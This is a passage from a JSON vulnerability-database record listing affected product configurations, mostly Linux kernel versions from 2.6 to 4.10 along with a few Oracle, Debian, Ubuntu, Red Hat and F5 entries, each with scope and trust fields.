        "version": "2.6.16.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.88"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63-2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.267"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.214"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.87"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.90"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.30"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.09"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.71"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.67"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.70"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14-4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.11"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.12"
      },
      {
        "model": "traffix sdc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.2"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.47"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.76"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.8.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.273"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.55"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20-2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.34"
      },
      {
        "model": "enterprise linux long life 5.9.server",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.59"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.10"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.75"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.66"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.2"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.8"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "16.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.93"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.57"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2712"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18-53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.5"
      },
      {
        "model": "traffix sdc",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
